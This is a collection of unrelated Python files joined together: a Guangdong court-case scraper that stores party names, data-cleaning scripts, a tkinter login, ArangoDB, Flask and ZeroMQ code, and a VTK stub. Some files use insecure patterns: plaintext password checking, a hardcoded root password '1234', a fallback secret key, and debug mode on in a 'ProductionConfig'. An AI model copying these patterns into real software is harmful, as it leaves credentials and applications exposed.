            self.status = TASK_STATUS.NO_RECORD.value
        else:
            post_url = 'http://www.gdcourts.gov.cn/web/search?action=gotoajxxcx'
            detail_url = 'http://www.gdcourts.gov.cn/web/search?action=ajxxxq&ajid={}%20&ah=&dsr=&pageNum=1'
            for page in range(1, total_page + 1): # TODO just for test
                try:
                    self.update_form_data(page)
                    resp = self.downloader.post(post_url, headers=self.header, data=self.form_data)
                    data_dic_lst = resp.json().get('ajxxlist')
                    for item in data_dic_lst:
                        ajid = item.get('AJID')
                        url = detail_url.format(ajid)
                        self.get_detail_page(url)
                except Exception:
                    err_msg = u'下载出错,页码:{}, url:{}, 原因:{}'.format(page, self.start_url.format(page),
                                                                  traceback.format_exc())
                    self.logger.warning(err_msg)
                    raise LogicException(err_msg)
                # Throttle between pages.
                time.sleep(0.5)
    def get_detail_page(self, url):
        """Download one case's detail page and hand it to parse_per_page.

        Raises LogicException on failure.
        """
        header = {'Accept': 'image/webp,image/apng,image/*,*/*;q=0.8',
                  'Accept-Encoding': 'gzip,deflate',
                  'Accept-Language': 'zh-CN,zh;q=0.9',
                  'Connection': 'keep-alive',
                  'Host': 'www.gdcourts.gov.cn',
                  'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36('
                                'KHTML,likeGecko)Chrome/69.0.3497.100Safari/537.36',
                  }
        try:
            resp = self.downloader.get(url, headers=header)
            if not resp:
                err_msg = u'下载详情页码resp为False'
                self.logger.warning(err_msg)
                raise LogicException(err_msg)
            html = resp.content
            self.parse_per_page(html, url)
        except Exception:
            err_msg = u'下载详情出错 url:{}, 原因:{}'.format(url, traceback.format_exc())
            self.logger.warning(err_msg)
            raise LogicException(err_msg)
    def parse_per_page(self, html, url):
        """Extract one case's fields from its detail page HTML and persist
        them via the ktgg tooling.

        Raises LogicException if extraction or persistence fails.
        """
        try:
            et = etree.HTML(html)
            collection = []
            print '*'*100
            print et
            print '*'*100
            data_lst = et.xpath('.//div[@id="a1"]')
            if not data_lst:
                return collection
            raw_id = self.ktgg_tool.insert_page_source(html, self.ename, self.cname, self.do_time)
            self.logger.info(self.stat_dict)
            case_number = ''.join(et.xpath('.//h2//text()')).strip()
            # Flatten all <td> cells into alternating key/value pairs.
            data_lst = [item.xpath('string(.)').strip() for item in et.xpath('.//td')]
            key = data_lst[::2]
            val = data_lst[1::2]
            data_dic = dict(zip(key, val))
            court_room = data_dic.get(u'承办部门')
            case_cause = data_dic.get(u'案由')
            party = data_dic.get(u'当事人')
            # Party text is "applicant respondent"; strip the role prefixes.
            temp_lst = party.split()
            prosecutor = temp_lst[0].strip(unicode('申请人:'))
            defendant = temp_lst[1].strip(unicode('被申请人:'))
            # party_parse = prosecutor + ', ' + defendant
            court_date = data_dic.get(u'立案日期')
            presiding_judge = data_dic.get(u'主审法官')
            # doc = '{} {} {} {} {}'.format(case_number, case_cause, party, court_date, court_room)
            data_dict = {
                # 'date': self.do_time,
                "case_number": case_number,
                # "doc": doc,
                "court_date": court_date,
                # "doc_id": "{}_{}".format(case_number, court_date),
                "case_cause": case_cause,
                "domain": self.domain,
                "ename": self.ename,
                "cname": self.cname,
                "prosecutor": prosecutor,
                "defendant": defendant,
                "court_room": court_room,
                "presiding_judge": presiding_judge,
                "province": u'广东',
                "party": party,
                # "party_parse": party_parse,
                # "party_parse_flag": 0,
                "url": url,
                "raw_id": raw_id
            }
            unique_id = '{}_{}_{}'.format(self.ename, case_number, court_date)
            self.ktgg_tool.insert_ktgg_data(data_dict, self.stat_dict, unique_id)
        except Exception:
            err_msg = u'保存数据出现异常url: {}'.format(url)
            self.logger.error(err_msg)
            raise LogicException(err_msg)
        self.logger.info(u'保存{}数据完成'.format(url))
        self.logger.info(self.stat_dict)
if __name__ == '__main__':
    # Ad-hoc manual run: incremental crawl starting from page 1.
    seed_dict = {'ename': None, 'is_increment': True, 'page': 1}
    ins = GuangDongFaYuanWang(None, seed_dict)
    a = ins.start()
    print a
|
import csv
import numpy as np
import pandas as pd
from sklearn import preprocessing
from sklearn.feature_extraction import DictVectorizer
from sklearn.cross_validation import train_test_split
from sklearn import cross_validation
from sklearn.model_selection import cross_val_predict
from sklearn import tree
from sklearn.naive_bayes import GaussianNB
from sklearn.ensemble import RandomForestClassifier
from sklearn import svm
import datetime
import matplotlib.pyplot as plt
import matplotlib as mpl
import re
from IPython.display import Image
import os
import pydotplus
from sklearn.learning_curve import learning_curve
import pylab as pl
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import classification_report
from sklearn.metrics import roc_curve,auc,roc_auc_score
from sklearn.metrics import confusion_matrix
from sklearn import metrics
import seaborn as sns
import importlib,sys
from scipy import interp
from sklearn.grid_search import GridSearchCV
# Re-read the merged results with every column as raw strings (utf-8-sig
# strips a possible BOM), blank out cells that are exactly the string '0',
# and write the file back in place in plain utf-8.
df=pd.read_csv('new_result.csv',encoding='utf-8-sig',dtype=object)
df=df.replace('0','')
df.to_csv("new_result.csv",header=True,index=False,encoding='utf-8')
#df=df.fillna('')
#label=df['Result']
#
#df1=df.drop('Result',axis=1)
#df2=df1.drop('Other_Info',axis=1)
#
#
#encoder=preprocessing.LabelEncoder()
#labels=encoder.fit_transform(label)
#
#featurelist=df2
#vec=DictVectorizer()
#featurelist=vec.fit_transform(featurelist.to_dict(orient='records')).toarray()
#data_train,data_test,target_train,target_test=train_test_split(featurelist,labels,test_size=0.25)
#
#
#estimators = {}
#estimators['forest_100'] = RandomForestClassifier(n_estimators =100,oob_score=True,random_state=2,max_features='auto',min_samples_leaf=2,n_jobs=-1,class_weight={0:.12,1:.88})
#
#parameters={'max_features': ['auto', 'sqrt', 'log2'],
# 'min_samples_leaf':[1,10],
# 'random_state':[1,],
# 'class_weight':[{1:m} for m in [0.7,0.9]]}
#gridsearch = GridSearchCV(estimators['forest_100'],param_grid=parameters,cv=10)
#gridsearch.fit(featurelist,labels)
#print (gridsearch.best_params_,gridsearch.best_score,gridsearch.best_estimator_)
|
from tkinter import *
from tkinter import messagebox
# Build the login window: two labelled entry fields laid out on a grid.
w=Tk()
w.geometry("400x300")
w.title("login")
w.config(bg="pink")
Label(text="username").grid(row=0,column=0)
username=Entry()
username.grid(row=0,column=1)
Label(text="password").grid(row=1,column=0)
password=Entry(show="*")  # mask the typed password
password.grid(row=1,column=1)
def login():
    """Check the entered credentials against the space-separated
    "username password" lines in admin.txt and show the verdict in a
    message box.

    FIXES vs. the original:
    - the file handle was never closed; a context manager now handles it;
    - messagebox.showinfo("unauthorized user") passed the message as the
      *title* (showing an empty dialog body); both arguments are now given;
    - the unauthorized dialog now fires once, after all lines are checked
      (for/else), instead of potentially once per non-matching line
      (original indentation was ambiguous — confirm intent);
    - debug print() calls removed.
    """
    uname = username.get()
    pwd = password.get()
    with open("admin.txt", "r") as f:
        for line in f:
            parts = line.split(" ")
            if parts[0] == uname and pwd in parts[1]:
                messagebox.showinfo("login", "authorized user")
                break
        else:
            messagebox.showinfo("login", "unauthorized user")
# Wire the button to the login handler and enter the Tk event loop.
Button(text="login",command=login).grid(row=2,column=0,columnspan=2)
w.mainloop()
import pandas as pd
from pyArango.connection import *
# Download the IMDB ratings CSV into a DataFrame.
# NOTE(review): `movies` is never used below — presumably intended for a
# later bulk insert into the collection; confirm.
movies = pd.read_csv('http://bit.ly/imdbratings')
# Connect to a local ArangoDB server and create a collection in db "Filmes".
conn = Connection(username='root', password='1234')
db_filmes = conn["Filmes"]
col_filmes = db_filmes.createCollection(name="filmesAmericanos")
db_filmes['filmesAmericanos']  # NOTE(review): bare expression, has no effect
# Insert a single document with an explicit key.
doc1 = db_filmes["filmesAmericanos"].createDocument()
doc1["_key"] = "um_filme_ruim"
doc1["Nome"] = "O pior filme da minha vida"
doc1["Ano"] = 2019
doc1.save()
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 14 10:03:29 2020
@author: user
"""
def fahrenheit_to_celsius(fahrenheit):
    """Convert a temperature from Fahrenheit to Celsius.

    Bug fix: the original computed ``F * 5 / 9 - 32``; the correct
    formula is ``(F - 32) * 5 / 9``.
    """
    return (fahrenheit - 32) * 5 / 9

if __name__ == '__main__':
    華氏溫度 = input("輸入華式溫度:")
    攝氏溫度 = fahrenheit_to_celsius(int(華氏溫度))
    print(攝氏溫度)
"""1. 아래와 같이 숫자를 두번 물어보게 하고 ★을 출력해서 사각형을 만드시오
가로의 숫자를 입력하시오 :
세로의 숫자를 입력하시오 : """
import numpy as np
def rectangle(width, height):
    """Return a width x height block of '*' characters, rows joined by newlines.

    Extracted from the inline nested loop so the drawing logic is testable;
    uses string repetition instead of a per-character inner loop.
    """
    return '\n'.join('*' * width for _ in range(height))

if __name__ == '__main__':
    a = int(input('가로의 숫자를 입력하시오:'))
    b = int(input('세로의 숫자를 입력하시오:'))
    print(rectangle(a, b))
|
#coding: utf-8
__author__ = 'lufee'
import os
basedir = os.path.abspath(os.path.dirname(__file__))  # directory containing this config module
class Config:
    """Base Flask configuration shared by all environments."""
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'hard to guess string'
    FLASKY_ADMIN = 'lufeewu@gmail.com' # email of the registered administrator user
    FLASKY_POSTS_PER_PAGE = 20  # pagination size for post listings
    @staticmethod
    def init_app(app):
        # Hook for environment-specific app initialisation; base does nothing.
        pass
class ProductionConfig(Config):
    """Configuration registered as 'default' in the config map below.

    NOTE(review): despite the name this looks like a *development* setup —
    DEBUG is enabled and the database URI reads DEV_DATABASE_URL, falling
    back to a local data-dev.sqlite file. Confirm before deploying.
    """
    DEBUG = True
    SQLALCHEMY_DATABASE_URI = os.environ.get('DEV_DATABASE_URL') or \
    'sqlite:///' + os.path.join(basedir, 'data-dev.sqlite')
# Map of configuration names to classes, consumed by the app factory.
config = {
    'default' : ProductionConfig,
}
import bs4
import re
import urllib.request
from urllib.request import Request, urlopen
#Url utilisée pour le scraping
# URL used for scraping
url = "https://www.monpetitgazon.com"
# Spoof a browser User-Agent: the site rejects urllib's default agent.
req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
web_byte = urlopen(req).read()
webpage = web_byte.decode('utf-8')
soup = bs4.BeautifulSoup(webpage, 'html.parser')
# Commented-out draft that extracted a title and wrote it to a file.
# Bug fix: the last line was `f#ichier.close()`, leaving a bare `f`
# expression that raised NameError at runtime (fichier is commented out).
#fichier = open("MPGStats.txt", "w")
#t = soup.find(class_='index__root___1KIse')
#titre = t.h4.get_text()
#fichier.write(titre)
#fichier.close()
"""
This type stub file was generated by pyright.
"""
from .vtkObject import vtkObject
# Auto-generated pyright type stub: method bodies are intentionally `...`.
class vtkDebugLeaks(vtkObject):
    """
    vtkDebugLeaks - identify memory leaks at program termination
    vtkDebugLeaks is used to report memory leaks at the exit of the
    program.
    Superclass: vtkObject
    It uses vtkObjectBase::InitializeObjectBase() (called via
    vtkObjectFactory macros) to intercept the construction of all VTK
    objects. It uses the UnRegisterInternal method of vtkObjectBase to
    intercept the destruction of all objects.
    If not using the vtkObjectFactory macros to implement New(), be sure
    to call vtkObjectBase::InitializeObjectBase() explicitly on the
    constructed instance. The rule of thumb is that wherever "new [some
    vtkObjectBase subclass]" is called,
    vtkObjectBase::InitializeObjectBase() must be called as well.
    There are exceptions to this:
    - vtkCommand subclasses traditionally do not fully participate in
    vtkDebugLeaks registration, likely because they typically do not
    use vtkTypeMacro to configure GetClassName. InitializeObjectBase
    should not be called on vtkCommand subclasses, and all such classes
    will be automatically registered with vtkDebugLeaks as "vtkCommand or
    subclass".
    - vtkInformationKey subclasses are not reference counted. They are
    allocated statically and registered automatically with a singleton
    "manager" instance. The manager ensures that all keys are cleaned
    up before exiting, and registration/deregistration with
    vtkDebugLeaks is bypassed.
    A table of object name to number of instances is kept. At the exit of
    the program if there are still VTK objects around it will print them
    out. To enable this class add the flag -DVTK_DEBUG_LEAKS to the
    compile line, and rebuild vtkObject and vtkObjectFactory.
    """
    def ConstructClass(self, vtkObjectBase):
        """
        V.ConstructClass(vtkObjectBase)
        C++: static void ConstructClass(vtkObjectBase *object)
        V.ConstructClass(string)
        C++: static void ConstructClass(const char *className)
        Call this when creating a class.
        """
        ...
    def DestructClass(self, vtkObjectBase):
        """
        V.DestructClass(vtkObjectBase)
        C++: static void DestructClass(vtkObjectBase *object)
        V.DestructClass(string)
        C++: static void DestructClass(const char *className)
        Call this when deleting a class.
        """
        ...
    def GetExitError(self):
        """
        V.GetExitError() -> int
        C++: static int GetExitError()
        Get/Set flag for exiting with an error when leaks are present.
        Default is on when VTK_DEBUG_LEAKS is on and off otherwise.
        """
        ...
    def GetNumberOfGenerationsFromBase(self, string):
        """
        V.GetNumberOfGenerationsFromBase(string) -> int
        C++: vtkIdType GetNumberOfGenerationsFromBase(const char *type)
        override;
        Given a the name of a base class of this class type, return the
        distance of inheritance between this class type and the named
        class (how many generations of inheritance are there between this
        class and the named class). If the named class is not in this
        class's inheritance tree, return a negative value. Valid
        responses will always be nonnegative. This method works in
        combination with vtkTypeMacro found in vtkSetGet.h.
        """
        ...
    def GetNumberOfGenerationsFromBaseType(self, string):
        """
        V.GetNumberOfGenerationsFromBaseType(string) -> int
        C++: static vtkIdType GetNumberOfGenerationsFromBaseType(
        const char *type)
        Given a the name of a base class of this class type, return the
        distance of inheritance between this class type and the named
        class (how many generations of inheritance are there between this
        class and the named class). If the named class is not in this
        class's inheritance tree, return a negative value. Valid
        responses will always be nonnegative. This method works in
        combination with vtkTypeMacro found in vtkSetGet.h.
        """
        ...
    def IsA(self, string):
        """
        V.IsA(string) -> int
        C++: vtkTypeBool IsA(const char *type) override;
        Return 1 if this class is the same type of (or a subclass of) the
        named class. Returns 0 otherwise. This method works in
        combination with vtkTypeMacro found in vtkSetGet.h.
        """
        ...
    def IsTypeOf(self, string):
        """
        V.IsTypeOf(string) -> int
        C++: static vtkTypeBool IsTypeOf(const char *type)
        Return 1 if this class type is the same type of (or a subclass
        of) the named class. Returns 0 otherwise. This method works in
        combination with vtkTypeMacro found in vtkSetGet.h.
        """
        ...
    def NewInstance(self):
        """
        V.NewInstance() -> vtkDebugLeaks
        C++: vtkDebugLeaks *NewInstance()
        """
        ...
    def PrintCurrentLeaks(self):
        """
        V.PrintCurrentLeaks() -> int
        C++: static int PrintCurrentLeaks()
        Print all the values in the table. Returns non-zero if there
        were leaks.
        """
        ...
    def SafeDownCast(self, vtkObjectBase):
        """
        V.SafeDownCast(vtkObjectBase) -> vtkDebugLeaks
        C++: static vtkDebugLeaks *SafeDownCast(vtkObjectBase *o)
        """
        ...
    def SetExitError(self, p_int):
        """
        V.SetExitError(int)
        C++: static void SetExitError(int)
        Get/Set flag for exiting with an error when leaks are present.
        Default is on when VTK_DEBUG_LEAKS is on and off otherwise.
        """
        ...
    # Standard Python object-protocol stubs emitted by the generator.
    def __delattr__(self, *args, **kwargs):
        """ Implement delattr(self, name). """
        ...
    def __getattribute__(self, *args, **kwargs):
        """ Return getattr(self, name). """
        ...
    def __init__(self, *args, **kwargs) -> None:
        ...
    @staticmethod
    def __new__(*args, **kwargs):
        """ Create and return a new object. See help(type) for accurate signature. """
        ...
    def __repr__(self, *args, **kwargs):
        """ Return repr(self). """
        ...
    def __setattr__(self, *args, **kwargs):
        """ Implement setattr(self, name, value). """
        ...
    def __str__(self, *args, **kwargs) -> str:
        """ Return str(self). """
        ...
    # Opaque attributes of the generated stub; real values unknown here.
    __this__ = ...
    __dict__ = ...
    __vtkname__ = ...
|
# -*- coding: utf-8 -*-
import logging
import zmq
class AdhsClient(object):
    """ZeroMQ REQ client for a simple key/value store protocol.

    Wire protocol (as used below): multipart frames
    ['GET', key] / ['SAVE', key, value] / ['EXISTS', key] / ['DELETE', key],
    with the first reply frame acting as a status ('OK' on success).
    NOTE(review): frames are sent as str objects — under Python 3, pyzmq
    requires bytes for send_multipart; this code appears to target
    Python 2. Confirm before porting.
    """
    def __init__(self):
        self.logger = logging.getLogger(self.__class__.__name__)
        self._active_servers = []
        self.context = zmq.Context()
        self.requester = self.context.socket(zmq.REQ)
        # Short receive timeout (250 ms) and send timeout (1 s); IMMEDIATE
        # makes sends fail fast instead of queueing when no peer is connected.
        self.requester.set(zmq.RCVTIMEO, 250)
        self.requester.set(zmq.SNDTIMEO, 1000)
        self.requester.set(zmq.IMMEDIATE, 1)
    def connectToServer(self, server='tcp://localhost:14005'):
        # Connect the REQ socket and remember the endpoint.
        self.logger.info('connecting to %s', server)
        self.requester.connect(server)
        self._active_servers.append(server)
    def active_servers(self):
        '''Get the list of active servers'''
        return self._active_servers
    def get(self, key):
        # KeyError both when no server is connected and when the server
        # does not report 'OK' for the key.
        if len(self._active_servers) == 0:
            raise KeyError
        self.requester.send_multipart(['GET', key])
        msg = self.requester.recv_multipart()
        if msg[0] != 'OK':
            raise KeyError
        # assumes the reply is [status, key, value] — TODO confirm
        return msg[2]
    def save(self, key, value):
        # Store a value; the reply status is only logged, not checked.
        if len(self._active_servers) == 0:
            raise ValueError
        self.requester.send_multipart(['SAVE', key, value])
        status, key, value = self.requester.recv_multipart()
        self.logger.info(
            'Status %s for saving key %s with value \'%s\'',
            status, key, value
        )
    def has_key(self, key):
        # True iff a server is connected and replies 'OK' for EXISTS.
        if len(self._active_servers) > 0:
            self.requester.send_multipart(['EXISTS', key])
            msg = self.requester.recv_multipart()
            if msg[0] == 'OK':
                return True
        return False
    def delete(self, key):
        # True iff a server is connected and acknowledges the DELETE.
        if len(self._active_servers) > 0:
            self.requester.send_multipart(['DELETE', key])
            msg = self.requester.recv_multipart()
            if msg[0] == 'OK':
                return True
        return False
|
import json

# Read the raw neighbour-district adjacency mapping from disk.
# The with-block closes the file on exit, so no explicit close() is needed.
with open('neighbor-districts.json') as src:
    data = json.load(src)
# Per-state lookup tables: 'c' is the state code, 'd' the list of district
# names whose case data is reported only at state level (so every such
# district is later collapsed into a single 'unknown_<code>' node).
assam_districts = {'c': 'as', 'd' : ['baksa','barpeta','bishwanath','bongaigaon','cachar','charaideo','chirang','darrang','dhemaji',
'dhubri','dibrugarh', 'dima hasao', 'goalpara', 'golaghat', 'hailakandi', 'hojai', 'jorhat','kamrup metropolitan',
'kamrup', 'east karbi anglong', 'karimganj','kokrajhar','lakhimpur','majuli','morigaon','nagaon','nalbari','sivasagar',
'sonitpur','south salmara mankachar','tinsukia','udalguri','west karbi anglong'] }
manipur_districts ={ 'c':'mn', 'd' : ['bishnupur','chandel','churachandpur','imphal east','imphal west','jiribam','kakching','kamjong',
'kangpokpi','noney','pherzawl','senapati','tamenglong','tengnoupal','thoubal','ukhrul'] }
sikkim_districts = {'c':'sk' , 'd': ['east sikkim', 'north sikkim','south sikkim','west sikkim'] }
telangana_districts = {'c':'tg', 'd': ['bhadradri kothagudem','hyderabad','jagtial','jangaon','jayashankar bhupalapally',
'jogulamba gadwal', 'kamareddy','karimnagar','khammam','komram bheem','mahabubabad','mahabubnagar','mancherial',
'medak','medchal malkajgiri','mulugu','nagarkurnool','nalgonda','narayanpet','nirmal','nizamabad','peddapalli',
'rajanna sircilla','ranga reddy','sangareddy','siddipet','suryapet','vikarabad','wanaparthy','warangal rural',
'warangal urban','yadadri bhuvanagiri'] }
goa_districts = {'c':'ga', 'd': ['north goa', 'south goa'] }
#data cleaning
# Normalizes every district name (keys AND neighbour lists) so they match
# the spellings used by the case-count data: strips the "_district" suffix,
# converts underscores/hyphens to spaces, and applies a long table of
# one-off renames (old spelling -> current official name).
qd = "Q987" #for delhi
data = {key.replace("_district",''):value for key,value in data.items()} #remove suffix '_district'
# Iterate over a snapshot (list(...)) because keys are popped/re-inserted
# while iterating. The elif ordering and the `continue`s are load-bearing:
# a `continue` skips the generic "_"-to-space pass for names already fixed.
for key,value in list(data.items()):
    # --- pass 1: normalize each neighbour name in the value list ---
    for x in range(len(value)):
        if("_district" in value[x]):
            sub = value[x].split("_district")
            value[x] = sub[0]+sub[1]
        if(value[x].startswith("ri-bhoi")):
            value[x] = value[x].replace("-",'')
        if("-" in value[x]):
            sub = value[x].split("-")
            value[x] = sub[0]+" "+sub[1]
        elif("delhi" in value[x] or 'shahdara' in value[x]):
            value[x] = "delhi/"+qd
        elif(value[x] == "bijapur/Q1727570"):
            value[x] = "vijayapura/Q1727570"
        elif(value[x] == "bijapur/Q100164"):
            continue
        elif("pashchimi" in value[x]):
            value[x] = value[x].replace("pashchimi", "west")
        elif("pashchim" in value[x]):
            value[x] = value[x].replace("pashchim", "west")
        elif("purba" in value[x] and "medinipur" not in value[x] and 'bardhaman' not in value[x]):
            value[x] = value[x].replace("purba", "east")
        elif("purbi" in value[x] ):
            value[x] = value[x].replace("purbi", "east")
        elif(value[x].startswith('nav_sari')):
            value[x] = value[x].replace('_', '')
            continue
        elif(value[x].startswith('rae_bareilly')):
            sub = value[x].split("/")
            value[x] = 'rae bareli/'+sub[1]
        elif(value[x].startswith('panch_mahal')):
            value[x] = value[x].replace('_', '')
            continue
        elif(value[x].startswith('sabar')):
            value[x] = value[x].replace('_', '')
            continue
        elif(value[x].startswith('sait')):
            sub = value[x].split("/")
            value[x] = "sant kabir nagar/"+sub[1]
            continue
        elif(value[x].startswith('seraikela_kharsawan')):
            sub = value[x].split("/")
            value[x] = "saraikela-kharsawan/"+sub[1]
            continue
        elif(value[x].startswith('shaheed_bhagat')):
            sub = value[x].split("/")
            value[x] = "shahid bhagat singh nagar/"+sub[1]
            continue
        elif(value[x].startswith('siddharth')):
            sub = value[x].split("/")
            value[x] = "siddharthnagar/"+sub[1]
            continue
        elif(value[x].startswith('sri_potti_sriramulu_nellore')):
            sub = value[x].split("/")
            value[x] = 's.p.s. nellore/'+sub[1]
            continue
        elif(value[x].startswith('the_dangs')):
            sub = value[x].split("/")
            value[x] = 'dang/'+sub[1]
            continue
        elif(value[x].startswith('ambedkar')):
            sub = value[x].split("/")
            value[x] = 'ambedkar nagar/'+sub[1]
        elif(value[x].startswith('ashok')):
            sub = value[x].split("/")
            value[x] = 'ashoknagar/'+sub[1]
        elif(value[x].startswith('banas')):
            sub = value[x].split("/")
            value[x] = 'banaskantha/'+sub[1]
        elif(value[x].startswith('bangalore_rural')):
            sub = value[x].split("/")
            value[x] = 'bengaluru rural/'+sub[1]
        elif(value[x].startswith('bangalore_urban')):
            sub = value[x].split("/")
            value[x] = 'bengaluru urban/'+sub[1]
        elif(value[x].startswith('devbhumi_dwaraka')):
            sub = value[x].split("/")
            value[x] = 'devbhumi dwarka/'+sub[1]
        elif(value[x].startswith('fategarh_sahib')):
            sub = value[x].split("/")
            value[x] = 'fatehgarh sahib/'+sub[1]
        elif(value[x].startswith('jyotiba')):
            sub = value[x].split("/")
            value[x] = 'amroha/'+sub[1]
        elif(value[x].startswith('kaimur')):
            sub = value[x].split("/")
            value[x] = 'kaimur/'+sub[1]
        elif(value[x].startswith('sahibzada_ajit_singh_nagar')):
            sub = value[x].split("/")
            value[x] = 's.a.s. nagar/'+sub[1]
        # generic fallbacks: underscores -> spaces, drop a leading "the".
        if("_" in value[x]):
            sub = value[x].split("_",-1)
            if(len(sub)==2):
                value[x] = sub[0]+" "+sub[1]
            elif(len(sub)==3):
                value[x] = sub[0]+" "+sub[1]+" "+sub[2]
            elif(len(sub)==4):
                value[x] = sub[0]+" "+sub[1]+" "+sub[2]+" "+sub[3]
        if("the" in value[x]):
            value[x] = value[x].replace("the ","")
        # one-off spelling fixes applied AFTER the generic passes.
        sub = value[x].split("/")
        if(sub[0]=="anugul"):
            value[x] = "angul/"+sub[1]
        elif(sub[0]=='aizwal'):
            value[x] = "aizawl/"+sub[1]
        elif(value[x].startswith("ashok")):
            value[x] = value[x].replace("_",'')
        elif(sub[0]=='badgam'):
            value[x] = "budgam/"+sub[1]
        elif(value[x].startswith("baloda")):
            value[x]=value[x].replace("_",' ')
        elif(value[x].startswith("banas")):
            value[x]=value[x].replace("_",'')
        elif(sub[0]=='baramula'):
            value[x] = "baramulla/"+sub[1]
        elif(sub[0]=='baudh'):
            value[x] = "boudh/"+sub[1]
        elif(sub[0]=='bellary'):
            value[x] = "ballari/"+sub[1]
        elif(sub[0]=='chamarajanagar'):
            value[x] = 'chamarajanagara/'+sub[1]
        elif(sub[0]=='charkhi_dadri'):
            value[x] = 'charkhi dadri/'+sub[1]
        elif(sub[0]== 'dakshina_kannada'):
            value[x] = 'dakshina kannada/'+sub[1]
        elif(sub[0]== 'dantewada'):
            value[x] = 'dakshin bastar dantewada/'+sub[1]
        elif(sub[0]== 'dhaulpur'):
            value[x] = 'dholpur/'+sub[1]
        elif(sub[0]=='firozpur'):
            value[x] = 'ferozepur/'+sub[1]
        elif(sub[0]=='gondiya'):
            value[x] = 'gondia/'+sub[1]
        elif(sub[0]=='jagatsinghapur'):
            value[x] = 'jagatsinghpur/'+sub[1]
        elif(sub[0]=='jajapur'):
            value[x] = 'jajpur/'+sub[1]
        elif(sub[0]=='jalor'):
            value[x] = 'jalore/'+sub[1]
        elif(sub[0]=='kanchipuram'):
            value[x] = 'kancheepuram/'+sub[1]
        elif(sub[0]=='kheri'):
            value[x] = 'lakhimpur kheri/'+sub[1]
        elif(sub[0]=='kochbihar'):
            value[x] = 'cooch behar/'+sub[1]
        elif(sub[0]=='kodarma'):
            value[x] = 'koderma/'+sub[1]
        elif(sub[0]=='lahul and spiti'):
            value[x] = 'lahaul and spiti/'+sub[1]
        elif(sub[0]=='mahesana'):
            value[x] = 'mehsana/'+sub[1]
        elif(sub[0]=='mahrajganj'):
            value[x] = 'maharajganj/'+sub[1]
        elif(sub[0]=='maldah'):
            value[x] = 'malda/'+sub[1]
        elif(sub[0]=='marigaon'):
            value[x] = 'morigaon/'+sub[1]
        elif(sub[0]=='muktsar'):
            value[x] = 'sri muktsar sahib/'+sub[1]
        elif(sub[0]=='mumbai city'):
            value[x] = 'mumbai/'+sub[1]
        elif(sub[0]=='nandubar'):
            value[x] = 'nandurbar/'+sub[1]
        elif(sub[0]=='narsimhapur'):
            value[x] = 'narsinghpur/'+sub[1]
        elif(sub[0]=='pakaur'):
            value[x] = 'pakur/'+sub[1]
        elif(sub[0]=='palghat'):
            value[x] = 'palakkad/'+sub[1]
        elif(sub[0]=='pattanamtitta'):
            value[x] = 'pathanamthitta/'+sub[1]
        elif(sub[0]=='puruliya'):
            value[x] = 'purulia/'+sub[1]
        elif(sub[0]=='rajauri'):
            value[x] = 'rajouri/'+sub[1]
        elif(sub[0]=='rangareddy'):
            value[x] = 'ranga reddy/'+sub[1]
        elif(value[x].startswith("sant ravidas")):
            value[x] = 'bhadohi/'+sub[1]
        elif(sub[0]=='sepahijala'):
            value[x] = 'sipahijala/'+sub[1]
        elif(sub[0]=='sharawasti'):
            value[x] = 'shrawasti/'+sub[1]
        elif(sub[0]=='shimoga'):
            value[x] = 'shivamogga/'+sub[1]
        elif(sub[0]=='shopian'):
            value[x] = 'shopiyan/'+sub[1]
        elif(sub[0]=='sivagangai'):
            value[x] = 'sivaganga/'+sub[1]
        elif(value[x].startswith('sri ganganagar')):
            value[x] = 'ganganagar/'+sub[1]
        elif(value[x].startswith('thoothukudi')):
            value[x] = 'thoothukkudi/'+sub[1]
        elif(value[x].startswith('tiruchchirappalli')):
            value[x] = 'tiruchirappalli/'+sub[1]
        elif(value[x].startswith('tirunelveli')):
            value[x] = 'tirunelveli/'+sub[1]
        elif(value[x].startswith('tiruvanamalai')):
            value[x] = 'tiruvannamalai/'+sub[1]
        elif(value[x].startswith('tumkur')):
            value[x] = 'tumakuru/'+sub[1]
        elif(value[x].startswith('yadagiri')):
            value[x] = 'yadgir/'+sub[1]
        elif(value[x].startswith('ysr')):
            value[x] = 'y.s.r. kadapa/'+sub[1]
        elif(value[x].startswith('baleshwar')):
            value[x] = 'balasore/'+sub[1]
        elif(value[x].startswith('belgaum')):
            value[x] = 'belagavi/'+sub[1]
        elif(value[x].startswith('debagarh')):
            value[x] = 'deogarh/'+sub[1]
        elif(value[x].startswith('faizabad')):
            value[x] = 'ayodhya/'+sub[1]
        elif(sub[0]=='bid'):
            value[x] = 'beed/'+sub[1]
        elif(value[x].startswith('hugli')):
            value[x] = 'hooghly/'+sub[1]
        elif(value[x].startswith('jhunjhunun')):
            value[x] = 'jhunjhunu/'+sub[1]
        elif(value[x].startswith('bemetara')):
            value[x] = 'bametara/'+sub[1]
        elif(value[x].startswith('kabirdham')):
            value[x] = 'kabeerdham/'+sub[1]
        elif(value[x].startswith('sonapur')):
            value[x] = 'subarnapur/'+sub[1]
        # elif(sub[0].startswith("east")):
        # sub1 = sub[0].split("_",-1)
        # if(len(sub1)==2):
        # value[x] = "east "+sub1[1]+"/"+sub[1]
        # elif(len(sub1)==3):
        # value[x] = "east "+sub1[1]+' '+sub1[2]+"/"+sub[1]
        elif(sub[0].endswith("east")):
            sub1 = sub[0].split("_",-1)
            if(len(sub1)==2):
                value[x] = sub1[0]+" east"+"/"+sub[1]
        elif(sub[0].endswith("west")):
            sub1 = sub[0].split("_",-1)
            if(len(sub1)==2):
                value[x] = sub1[0]+" west"+"/"+sub[1]
    # --- pass 2: apply the same normalization to the key itself,
    # popping the old key and re-inserting under the fixed spelling ---
    sub=key.split("/")
    if(key.startswith("south_salmara-mankachar")):
        data["south salmara mankachar/"+sub[1]] = data.pop(key)
    elif('delhi' in key or key.startswith('shahdara')):
        data['delhi/'+qd] = data.pop(key)
    elif(key == "bijapur/Q1727570"):
        data["vijayapura/Q1727570"] = data.pop(key)
    elif(key == "bijapur/Q100164"):
        continue
    elif(key.startswith("lahul_and_spiti")):
        data["lahaul and spiti/"+sub[1]] = data.pop(key)
    elif(key.startswith("mumbai_city")):
        data["mumbai/"+sub[1]] = data.pop(key)
    elif(key.startswith("nav_sari")):
        data["navsari/"+sub[1]] = data.pop(key)
    elif(key.startswith("panch_mahal")):
        data["panchmahal/"+sub[1]] = data.pop(key)
